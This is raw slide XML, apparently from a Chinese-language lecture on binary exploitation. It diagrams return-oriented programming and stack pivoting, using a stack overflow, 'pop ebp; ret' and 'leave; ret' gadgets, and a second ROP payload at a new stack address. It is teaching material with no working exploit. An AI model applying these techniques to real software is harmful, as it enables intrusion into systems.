            <a:ext cx="124400" cy="290400"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2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819" name="Shape 1819"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="3820100"/>
            <a:ext cx="2095200" cy="7636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new stack addr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820" name="Shape 1820"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5110967" y="3942033"/>
            <a:ext cx="3000400" cy="5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ebp = new stack addr</a:t>
            </a:r>
            <a:endParaRPr sz="1867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1821" name="Shape 1821"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1814" idx="0"/>
            <a:endCxn id="1804" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="4894000" y="2316736"/>
            <a:ext cx="400" cy="9488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822" name="Shape 1822"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164700" y="2198333"/>
            <a:ext cx="2095200" cy="2904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gadget 1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823" name="Shape 1823"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="1632451"/>
            <a:ext cx="2095200" cy="2904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gadget N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824" name="Shape 1824"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10756800" y="2164725"/>
            <a:ext cx="848800" cy="9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new stack addr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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1825" name="Shape 1825"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="10259833" y="2777525"/>
            <a:ext cx="4256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0" name="矩形 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{772EDA22-2AE2-4CC2-89DE-74CF518521EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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其它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ROP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技巧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68D2B68-29D0-47D9-A35F-5B70048C6E7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1930837" y="1434895"/>
            <a:ext cx="83303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磁盘中的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ELF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（可执行文件）与内存中的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ELF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（进程内存映像）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45D6B1A7-57DC-4FE9-B40B-096F28BB10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0432" y="2277991"/>
            <a:ext cx="5504762" cy="3342857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8EFCFD4E-9968-41AB-B367-AA9CD9F34C76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4007548" y="5620848"/>
            <a:ext cx="899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节视图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9AB3CE3-B932-4FA0-8A70-CA807FFB2736}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6761480" y="5606344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段视图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B8770E1-A82E-4967-BE7A-6D510B03673C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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二进制基础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| Linux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下的可执行文件格式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ELF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4170921398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0" name="Shape 1830"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="593725"/>
            <a:ext cx="11360150" cy="763588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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>栈迁移</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>: "pop ebp ret" + "leave ret"</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1831" name="Shape 1831"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164700" y="4571167"/>
            <a:ext cx="2095200" cy="7636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pop ebp ret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832" name="Shape 1832"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394167" y="4751667"/>
            <a:ext cx="3000400" cy="4096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" sz="1867" b="1" kern="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pop ebp ; ret ;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1833" name="Shape 1833"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1831" idx="1"/>
            <a:endCxn id="1832" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6394700" y="4952967"/>
            <a:ext cx="1770000" cy="36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834" name="Shape 1834"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6729840" y="3610860"/>
            <a:ext cx="848800" cy="4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ESP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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1835" name="Shape 1835"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7627107" y="3815660"/>
            <a:ext cx="537600" cy="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836" name="Shape 1836"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394167" y="5816967"/>
            <a:ext cx="3000400" cy="5392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stack overflow; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867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1837" name="Shape 1837"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1836" idx="0"/>
            <a:endCxn id="1832" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4894367" y="5161367"/>
            <a:ext cx="0" cy="6556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838" name="Shape 1838"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="939500" y="3200736"/>
            <a:ext cx="2095200" cy="5392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" sz="1600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mov   esp, ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1600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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600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pop   ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1600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839" name="Shape 1839"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3393800" y="3265536"/>
            <a:ext cx="3000400" cy="4096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leave ; ret ;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840" name="Shape 1840"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="3088536"/>
            <a:ext cx="2095200" cy="7636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leave ret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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1841" name="Shape 1841"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1832" idx="0"/>
            <a:endCxn id="1839" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4893967" y="3675267"/>
            <a:ext cx="400" cy="10764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842" name="Shape 1842"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1840" idx="1"/>
            <a:endCxn id="1839" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6394233" y="3470336"/>
            <a:ext cx="17704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843" name="Shape 1843"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200433" y="3318336"/>
            <a:ext cx="124400" cy="290400"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2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844" name="Shape 1844"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="3820100"/>
            <a:ext cx="2095200" cy="7636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new stack addr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845" name="Shape 1845"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5110967" y="3942033"/>
            <a:ext cx="3000400" cy="5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ebp = new stack addr</a:t>
            </a:r>
            <a:endParaRPr sz="1867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1846" name="Shape 1846"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1839" idx="0"/>
            <a:endCxn id="1847" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="4894000" y="2316736"/>
            <a:ext cx="400" cy="9488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848" name="Shape 1848"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="2488733"/>
            <a:ext cx="2095200" cy="2904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new ebp value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847" name="Shape 1847"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394167" y="1777533"/>
            <a:ext cx="3000400" cy="5392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ROP payload 2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849" name="Shape 1849"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="1907933"/>
            <a:ext cx="2095200" cy="2904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...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850" name="Shape 1850"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7556000" y="1665333"/>
            <a:ext cx="539200" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1851" name="Shape 1851"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1850" idx="1"/>
            <a:endCxn id="1847" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6394400" y="2047133"/>
            <a:ext cx="11616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852" name="Shape 1852"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164700" y="2198333"/>
            <a:ext cx="2095200" cy="2904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gadget 1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853" name="Shape 1853"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="1632451"/>
            <a:ext cx="2095200" cy="2904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gadget N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854" name="Shape 1854"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10756800" y="2164725"/>
            <a:ext cx="848800" cy="9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new stack addr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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1855" name="Shape 1855"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="10259833" y="2777525"/>
            <a:ext cx="4256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0" name="矩形 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24CF2195-48C4-47E2-A0C1-7D557935D02B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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其它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ROP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技巧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0" name="Shape 1860"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="593725"/>
            <a:ext cx="11360150" cy="763588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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>栈迁移</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>: "pop ebp ret" + "leave ret"</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1861" name="Shape 1861"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164700" y="4571167"/>
            <a:ext cx="2095200" cy="7636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pop ebp ret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862" name="Shape 1862"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394167" y="4751667"/>
            <a:ext cx="3000400" cy="4096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pop ebp ; ret ;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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1863" name="Shape 1863"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1861" idx="1"/>
            <a:endCxn id="1862" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6394700" y="4952967"/>
            <a:ext cx="1770000" cy="36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864" name="Shape 1864"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6729840" y="2567207"/>
            <a:ext cx="848800" cy="4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ESP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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1865" name="Shape 1865"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7627107" y="2772007"/>
            <a:ext cx="537600" cy="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866" name="Shape 1866"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394167" y="5816967"/>
            <a:ext cx="3000400" cy="5392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stack overflow; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867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1867" name="Shape 1867"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1866" idx="0"/>
            <a:endCxn id="1862" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4894367" y="5161367"/>
            <a:ext cx="0" cy="6556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868" name="Shape 1868"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="939500" y="3200736"/>
            <a:ext cx="2095200" cy="5392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" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov   esp, ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600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pop   ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1600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869" name="Shape 1869"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3393800" y="3265536"/>
            <a:ext cx="3000400" cy="4096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leave ; ret ;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870" name="Shape 1870"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="3088536"/>
            <a:ext cx="2095200" cy="7636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leave ret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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1871" name="Shape 1871"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1862" idx="0"/>
            <a:endCxn id="1869" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4893967" y="3675267"/>
            <a:ext cx="400" cy="10764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872" name="Shape 1872"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1870" idx="1"/>
            <a:endCxn id="1869" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6394233" y="3470336"/>
            <a:ext cx="17704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873" name="Shape 1873"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200433" y="3318336"/>
            <a:ext cx="124400" cy="290400"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2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874" name="Shape 1874"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="3820100"/>
            <a:ext cx="2095200" cy="7636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new stack addr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875" name="Shape 1875"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5110967" y="3942033"/>
            <a:ext cx="3000400" cy="5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ebp = new stack addr</a:t>
            </a:r>
            <a:endParaRPr sz="1867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1876" name="Shape 1876"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1869" idx="0"/>
            <a:endCxn id="1877" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="4894000" y="2316736"/>
            <a:ext cx="400" cy="9488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878" name="Shape 1878"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="2488733"/>
            <a:ext cx="2095200" cy="2904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new ebp value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877" name="Shape 1877"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394167" y="1777533"/>
            <a:ext cx="3000400" cy="5392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ROP payload 2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879" name="Shape 1879"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="1907933"/>
            <a:ext cx="2095200" cy="2904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...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880" name="Shape 1880"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7556000" y="1665333"/>
            <a:ext cx="539200" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1881" name="Shape 1881"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1880" idx="1"/>
            <a:endCxn id="1877" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6394400" y="2047133"/>
            <a:ext cx="11616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882" name="Shape 1882"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164700" y="2198333"/>
            <a:ext cx="2095200" cy="2904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gadget 1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883" name="Shape 1883"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="1632451"/>
            <a:ext cx="2095200" cy="2904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gadget N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884" name="Shape 1884"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10756800" y="2164725"/>
            <a:ext cx="848800" cy="9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new stack addr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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1885" name="Shape 1885"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="10259833" y="2777525"/>
            <a:ext cx="4256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886" name="Shape 1886"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5147067" y="2753964"/>
            <a:ext cx="3000400" cy="5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" sz="1867" b="1" kern="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esp = new stack addr</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0"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F894ACEE-A531-4FE3-8ECE-939B3C739021}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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其它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ROP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技巧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1" name="Shape 1891"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="593725"/>
            <a:ext cx="11360150" cy="763588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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>栈迁移</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>: "pop ebp ret" + "leave ret"</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1892" name="Shape 1892"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164700" y="4571167"/>
            <a:ext cx="2095200" cy="7636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pop ebp ret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893" name="Shape 1893"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394167" y="4751667"/>
            <a:ext cx="3000400" cy="4096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pop ebp ; ret ;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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1894" name="Shape 1894"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1892" idx="1"/>
            <a:endCxn id="1893" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6394700" y="4952967"/>
            <a:ext cx="1770000" cy="36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895" name="Shape 1895"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6729840" y="2276233"/>
            <a:ext cx="848800" cy="4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ESP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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1896" name="Shape 1896"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7627107" y="2481033"/>
            <a:ext cx="537600" cy="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897" name="Shape 1897"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394167" y="5816967"/>
            <a:ext cx="3000400" cy="5392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stack overflow; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867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1898" name="Shape 1898"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1897" idx="0"/>
            <a:endCxn id="1893" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4894367" y="5161367"/>
            <a:ext cx="0" cy="6556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899" name="Shape 1899"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="939500" y="3200736"/>
            <a:ext cx="2095200" cy="5392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" sz="1600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mov   esp, ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1600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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>pop   ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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900" name="Shape 1900"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3393800" y="3265536"/>
            <a:ext cx="3000400" cy="4096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leave ; ret ;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901" name="Shape 1901"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="3088536"/>
            <a:ext cx="2095200" cy="7636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leave ret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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1902" name="Shape 1902"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1893" idx="0"/>
            <a:endCxn id="1900" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4893967" y="3675267"/>
            <a:ext cx="400" cy="10764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903" name="Shape 1903"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1901" idx="1"/>
            <a:endCxn id="1900" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6394233" y="3470336"/>
            <a:ext cx="17704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904" name="Shape 1904"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200433" y="3318336"/>
            <a:ext cx="124400" cy="290400"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2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905" name="Shape 1905"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="3820100"/>
            <a:ext cx="2095200" cy="7636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new stack addr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906" name="Shape 1906"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5110967" y="3942033"/>
            <a:ext cx="3000400" cy="5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ebp = new stack addr</a:t>
            </a:r>
            <a:endParaRPr sz="1867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1907" name="Shape 1907"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1900" idx="0"/>
            <a:endCxn id="1908" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="4894000" y="2316736"/>
            <a:ext cx="400" cy="9488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909" name="Shape 1909"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="2488733"/>
            <a:ext cx="2095200" cy="2904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new ebp value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908" name="Shape 1908"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394167" y="1777533"/>
            <a:ext cx="3000400" cy="5392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ROP payload 2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910" name="Shape 1910"/>
          <p:cNvSpPr/>
          <p:nvPr/>
